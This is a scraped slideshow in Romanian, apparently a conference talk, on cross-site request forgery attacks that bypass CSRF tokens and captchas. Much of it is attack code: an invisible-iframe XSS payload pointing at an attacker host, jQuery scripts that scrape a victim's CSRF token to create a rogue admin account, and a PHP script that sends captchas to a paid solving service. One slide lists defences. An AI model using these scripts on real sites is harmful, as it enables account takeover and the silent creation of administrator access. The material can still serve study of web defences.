Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Cross Site Request Forgery Attacks

2,460 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Cross Site Request Forgery Attacks

  1. 1. Cross Site Request Forgery Attacks Security token bypass Captcha bypass Presented by Vlad Horatiu [email_address]
  2. 2. Ce este CSRF
  3. 3. Context <ul><li>Dispunem de: </li></ul><ul><ul><li>Acces la un web site pe care victima il poate frecventa </li></ul></ul><ul><ul><li>Cross Site Scripting (XSS) in domeniul in care victima avea privilegii superioare </li></ul></ul>
  4. 4. Principiul de baza <ul><li>Victima acceseaza site-ul in care avem acces </li></ul><ul><li>Prin intermediul javascript, victima trimite requesturi catre locatia in care are acces, prin intermediul XSS. </li></ul>
  5. 5. De ce avem nevoie de XSS? <ul><li>Browserele moderne permit requesturi AJAX, intrucat si accesul la sursa HTML a unei pagini, doar atata timp cat atat request-ul, cat si target-ul sau sunt pe acelasi domeniu. </li></ul><ul><li>Aceasta protectie restrictioneaza doar accesul la sursa unei pagini de pe alt domeniu, nu are niciun impact asupra accesarii sale (ex: iframe) </li></ul><ul><li>De ce? </li></ul><ul><ul><li>Securitate </li></ul></ul><ul><ul><li>Implicatii in web advertising </li></ul></ul><ul><ul><li>Securitate </li></ul></ul>
  6. 6. Initierea atacului <ul><li>Iframe din site-ul cu acces catre cel cu xss </li></ul><html> <iframe src=&quot;http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>&quot; width=&quot;50&quot; height = &quot;50&quot; style=&quot;filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;&quot;> </iframe> </html>
  7. 7. Login check function check() { $.get(&quot;login.html&quot;, function(data){ if(data.indexOf('blanaa') != -1) { var logged = tryToLogin(); } else { var logged = true; } }); }; function tryToLogin() { $.get(&quot;login.html&quot;, function(data){ $('#form_frame').contents().find('form').submit(); return (data.indexOf('blanaa') != -1); }); }
  8. 8. Token bypass <ul><li>URL atac CSRF clasic: </li></ul><ul><ul><li>http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned </li></ul></ul><ul><li>Link valid in cazul unei protectii token: </li></ul><ul><ul><li>http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f </li></ul></ul><ul><li>Code snippets (PHP): </li></ul><ul><ul><li>Generare token: </li></ul></ul><ul><ul><ul><li>mysql_query(“INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES (‘”. Intval($uid) .”’, ‘”. sha1(mt_rand(1000000, 9999999).microtime(true)) .”)’); </li></ul></ul></ul><ul><ul><li>Validare token: </li></ul></ul><ul><ul><ul><li>$query = mysql_query(“SELECT `user_token` FROM `user_tokens` WHERE `id` = ‘”. Intval($uid) .”’ LIMIT 1”); </li></ul></ul></ul><ul><ul><ul><li>$token = getQueryToken($query); </li></ul></ul></ul><ul><ul><ul><li>if($_COOKIE[‘token’] != $token) </li></ul></ul></ul><ul><ul><ul><ul><li>Die(‘Esti un bulangiu!’); </li></ul></ul></ul></ul>
  9. 9. Token bypass <ul><li>Javascript token crawler </li></ul>function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween('&token=', '&', data); alert(token); $.get(&quot;http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token&quot;+token, function(data){ }); }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  10. 10. Token bypass <ul><li>Javascript token crawler (POST) </li></ul>function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween(&quot;type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;&quot;, &quot;&quot;&quot;, data); $.post(&quot;http://victimsite.com/admin/add_user.php&quot;, { user: &quot;1337hacker&quot;, pass: &quot;pwned&quot;, token: token }, function(data) {}) }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  11. 11. Token bypass <ul><li>Metode de prevenire </li></ul><ul><ul><li>Protectie impotriva atacurilor XSS </li></ul></ul><ul><ul><li>Cerere de captcha la operatiunile cu grad mare de risc </li></ul></ul><ul><ul><li>Cerere de parola la operatiunile cu grad mare de risc </li></ul></ul><ul><ul><li>Folosirea Private Browsing </li></ul></ul><ul><ul><li>Setarea sesiunilor cu o data de expirare relativ mica </li></ul></ul><ul><ul><li>Scrierea token-ului intr-un mod greu de parsat de catre script (exemplu: prin intermediul unui javascript obfuscat) </li></ul></ul>
  12. 12. Token bypass <ul><li>Dezavantaje </li></ul><ul><ul><li>Sensibil la schimbarile structurii HTML </li></ul></ul>
  13. 13. Flash Cross-domain policy <ul><li>Ne permite sa facem requesturi ajax intre doua domenii diferite </li></ul><ul><li>Domeniul destinatie trebuie sa aiba domeniul sursa intr-un “whitelist”: crossdomain.xml </li></ul><ul><li>Exemplu de crossdomain.xml: </li></ul><cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy>
  14. 14. Captcha bypass <ul><li>Context </li></ul><ul><ul><li>Userul are campurile username si password completate, datorita autocomplete </li></ul></ul><ul><ul><li>Formularul de logare cere captcha verification </li></ul></ul><ul><li>Principiul de baza </li></ul><ul><ul><li>Preluarea image path-ului prin javascript </li></ul></ul><ul><ul><li>Trimiterea imaginii catre un script de captcha breaking (prin intermediul crossdomain.xml) </li></ul></ul><ul><ul><li>Trimiterea informatiilor de logare </li></ul></ul>
  15. 15. Captcha bypass <ul><li>Captcha breaking script snippet: </li></ul>$rand = sha1(mt_rand(1000000, 9999999).microtime(true)); if(isset($_GET['path']))   file_put_contents($rand.'.jpg', file_get_contents($_GET['path'])); if ($captcha = $client->upload($rand.'.jpg')) {     echo &quot;CAPTCHA {$captcha['captcha']} uploadedn&quot;;     sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);     if ($text = $client->get_text($captcha['captcha'])) {         echo $text;         } else {         $client->remove($captcha['captcha']);     echo '0';     } }
  16. 16. Captcha bypass <ul><li>Dezavantaje </li></ul><ul><ul><li>Timpul ridicat de rezolvare a captcha-ului </li></ul></ul><ul><ul><ul><li>Pentru ca metoda sa mearga, userul ar trebui sa ramana pe pagina cel putin un minut </li></ul></ul></ul><ul><ul><li>Costul ridicat al rezolvarilor captcha </li></ul></ul><ul><ul><li>Schimbarile in structura HTML </li></ul></ul><ul><ul><li>Necesitatea existentei Flash Player in sistemul victimei </li></ul></ul>
  17. 17. Exemple concrete <ul><li>Adaugare utilizatori intr-o platforma Wordpress </li></ul><ul><li>Adaugare user MySQL </li></ul>
  18. 18. Intrebari

×